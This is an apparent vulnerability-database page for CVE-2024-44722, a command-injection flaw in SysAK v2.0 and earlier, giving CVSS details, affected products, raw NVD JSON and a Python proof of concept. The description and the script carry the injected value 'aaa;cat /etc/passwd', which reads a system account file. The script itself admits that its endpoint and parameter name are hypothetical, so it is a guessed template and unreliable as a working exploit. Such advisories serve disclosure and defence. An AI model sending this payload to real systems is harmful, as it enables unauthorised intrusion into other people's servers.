Security Vulnerability Report
中文
CVE-2024-44722 CVSS 9.8 CRITICAL

CVE-2024-44722

Published: 2026-03-20 14:16:13
Last Modified: 2026-04-14 20:48:23

Description

SysAK v2.0 and before is vulnerable to command execution via aaa;cat /etc/passwd.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anolis:sysak:*:*:*:*:*:*:*:* - VULNERABLE
SysAK <= v2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2024-44722 (SysAK Remote Command Execution) # This script demonstrates the command injection vulnerability. import requests def exploit(target_url): # The vulnerable parameter accepts arbitrary input without sanitization # Payload uses ';' as a command separator to chain commands payload = "aaa;cat /etc/passwd" # Assuming the vulnerable endpoint accepts a POST request (adjust based on actual service) # The parameter name 'param' is hypothetical and represents the vulnerable input field data = { "param": payload } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response output:") print(response.text) # Check if the command execution evidence exists in response if "root:" in response.text: print("[!] Vulnerability confirmed: /etc/passwd content leaked.") else: print("[-] Could not confirm execution in response (might be blind or different parameter).") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual target IP and vulnerable endpoint target = "http://127.0.0.1:8080/api/vulnerable_endpoint" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44722", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:13.373", "lastModified": "2026-04-14T20:48:22.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SysAK v2.0 and before is vulnerable to command execution via aaa;cat /etc/passwd."}, {"lang": "es", "value": "SysAK v2.0 y versiones anteriores son vulnerables a la ejecución de comandos a través de «aaa;cat /etc /passwd»."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anolis:sysak:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0", "matchCriteriaId": "F1DEBF38-E6FA-452C-B283-DB6CADB052C6"}]}]}], "references": [{"url": "https://gist.github.com/0x00dream2/9984c109101c0b1e352f8ee9ad5e40fe#file-cve-2024-44722", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/anolis/sysak", "source": "[email protected]", "tags": ["Product"]}]}}